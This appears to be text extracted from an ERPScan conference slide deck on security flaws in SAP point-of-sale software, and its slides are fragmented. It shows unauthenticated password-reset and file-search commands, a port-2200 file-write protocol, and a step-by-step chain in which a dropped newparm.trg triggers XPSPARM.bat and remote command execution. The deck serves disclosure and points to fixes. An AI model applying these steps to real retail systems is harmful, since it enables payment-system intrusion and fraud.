Professional Documents
Culture Documents
Head of security
consulting at ERPScan
Conclusion
Introduction to POS 6
Lucas Zaichkowsky
“Point of Sale System Architecture and Security”
11
Magstripe readers
AND
Unencrypted data
EMV chip 12
Ross Anderson
“How Smartcard Payment Systems Fail”
The No-PIN attack 14
Peter Fillmore
“Crash and Pay: Owning and Cloning Payment Devices”
The previous work 18
Stawomir Jasek
“Hacking challenge: steal a car!”
MITM POS mobile 19
20
START HERE
Consumers POS Hardware POS Software POS Backend
Issuer
Payment Service
Provider (PSP)
Credit card
brand network Acquirers
22
Issuer
Payment Service
Provider (PSP)
Credit card
brand network Acquirers
23
Issuer
Payment Service
Provider (PSP)
Credit card
brand network Acquirers
24
Issuer
Payment Service
Provider (PSP)
Credit card
brand network Acquirers
25
Issuer
Payment Service
Provider (PSP)
Credit card
brand network Acquirers
26
Business day
Business day. The beginning 27
Terms Terms
Store Server
Open Open Get
Manager Manager
Login
Cashiers
Business day 28
Business day. End of Day 29
Terms Terms
Server Store
Close Send Close
Manager Manager
Logout
Cashiers
30
Language: C++
Store
Database
Manager
POS Client
Map
POS Client 37
Map
POS Client 38
Map
POS Client 39
Map
POS Client 40
Map
POS Client 41
Map
Xpress Server 42
Map
Xpress Server 43
Map
Xpress Server 44
Map
Store Manager 45
Map
Store Configurator 46
Map
Store Configurator 47
Map
48
Store
Database Manager
POS Client
Xpress POS Store
Server Configurator
PART I
50
Store
Database Manager
POS Client
Xpress POS PART II Store
Server Configurator
51
Store
Database Manager
POS Client
Xpress POS Store
Server Configurator
PART III
How does it work? Part 1
52
File Architecture
Port: 2202
Xpress POS
Server
Store
Manager
Port: [1433,1521,2638…]
Database
Handmade… 60
Help response 61
DEMO 1
64
BACKDOORS
BACKDOORS EVERYWHERE
65
66
Methods
67
Public
23% Private
77%
68
Request Response
Correct password and login:
APM-VALIDATE-PASSWD 0 1119 1 1337;1234567a Password and Login are OK
1119 0 1 1 Disp=Authenticated;APMCode=0;
Correct login:
APM-VALIDATE-PASSWD 0 1119 1 1337;12345 Wrong Password
1119 0 1 1 Disp=Authenticated;APMCode=1;
Incorrect login:
APM-VALIDATE-PASSWD 0 1119 1 1337;12345 Wrong Login
1119 0 1 1 Disp=Authenticated;APMCode=10;
69
Reset password
APM-RESET-PASSWD 0 1119 1 1337;CHANGEDPWD1
1119 0 1 1 Disp=Authenticated;APMCode=0;
FILE-FIND [file_path]
FILE-FIND C:\1234.txt
168 FILE-FIND 32 34680 19073 7 1234.txt
DEMO 2
How does it work? Part 3 72
Xpress POS
POS Client
Port: 2200 Server
73
MT_FILE_BAD = 42h B
MT_FILE_END = 43h C
MT_DATAGRAM = 44h D
MT_FILE_REQ_ERR = 45h E
MT_FILE_DATA = 46h F
MT_FILE_GOOD = 47h G
MT_REQ_DIR = 49h I
MT_FILE_REQ_SEND = 52h R
MT_FILE_SEND = 53h S
MT_UNTYPED = 55h U
MT_SEND_CANCEL = 58h X
MT_RESP_DIR = 69h i
MT_RECV_CANCEL = 78h x
75
F Size DATA
78
F Size DATA
79
F Size DATA
C
80
F Size DATA
C
81
F Size DATA
Write file
82
F Size DATA
Write file
G
83
F Size DATA
Write file
G G
84
DEMO 3
85
POS Client
Xpress Server
POS client
87
POS Client
Xpress Server
POS client
88
POS Client
Xpress Server
POS client
89
90
91
92
93
94
Xpress Server
POS client
95
1. Store configurator creates config files and Xpress Server will apply
them, if it finds a ”newparm.trg” file in the special directory.
2. We can write any data we want in any file on Xpress Server using port
2200.
3. POS Clients (Terminals) update their parameters after opening.
4. We can close and open POS Terminals using telnet and port 2202.
100
PORT 2200
Xpress POS
Attacker
Server Client
PORT 2202
Database
101
PORT 2200
Xpress POS
Attacker
Server Client
PORT 2202
Database
103
Database
100
Database
101
Database
102
Database
107
Database
104
Database
109
Database
110
Database
111
Database
108
Xpress Server
PORT 2200
…\SAP\Xpress Server\... …\Xpress Server\PARM\...
Attacker
Listening PORT
111
PORT 2200
…\SAP\Xpress Server\... …\Xpress Server\PARM\...
Attacker
Listening PORT
112
PORT 2200
…\SAP\Xpress Server\... …\Xpress Server\PARM\...
2 “newparm.trg”
Attacker
Listening PORT
113
PORT 2200
…\SAP\Xpress Server\... …\Xpress Server\PARM\...
2 “newparm.trg”
3 Found “newparm.trg”
Attacker
Listening PORT
114
PORT 2200
…\SAP\Xpress Server\... …\Xpress Server\PARM\...
2 “newparm.trg”
3 Found “newparm.trg”
4 Delete “newparm.trg”
Attacker
Listening PORT
115
PORT 2200
…\SAP\Xpress Server\... …\Xpress Server\PARM\...
2 “newparm.trg”
3 Found “newparm.trg”
4 Delete “newparm.trg”
Attacker
5 Search for “XPSPARM.bat”
Listening PORT
116
PORT 2200
…\SAP\Xpress Server\... …\Xpress Server\PARM\...
2 “newparm.trg”
3 Found “newparm.trg”
4 Delete “newparm.trg”
Attacker
5 Search for “XPSPARM.bat”
6 Execute “XPSPARM.bat”
Listening PORT
117
PORT 2200
…\SAP\Xpress Server\... …\Xpress Server\PARM\...
2 “newparm.trg”
3 Found “newparm.trg”
4 Delete “newparm.trg”
Attacker
5 Search for “XPSPARM.bat”
6 Execute “XPSPARM.bat”
Listening PORT
PORT 2200
…\SAP\Xpress Server\... …\Xpress Server\PARM\...
2 “newparm.trg”
3 Found “newparm.trg”
4 Delete “newparm.trg”
Attacker
5 Search for “XPSPARM.bat”
6 Execute “XPSPARM.bat”
Listening PORT
8 Any command
119
PORT 2200
…\SAP\Xpress Server\... …\Xpress Server\PARM\...
2 “newparm.trg”
3 Found “newparm.trg”
4 Delete “newparm.trg”
Attacker
5 Search for “XPSPARM.bat”
6 Execute “XPSPARM.bat”
Listening PORT
8 Any command
9 Execute command
120
DEMO 4
121
Fixes
122
7th of September2017
All SAP notes 132
EU:
Join our webinars Luna ArenA 238 Herikerbergweg, 1101 CM Amsterdam
erpscan.com/category/press-center/events/ Phone +31 20 8932892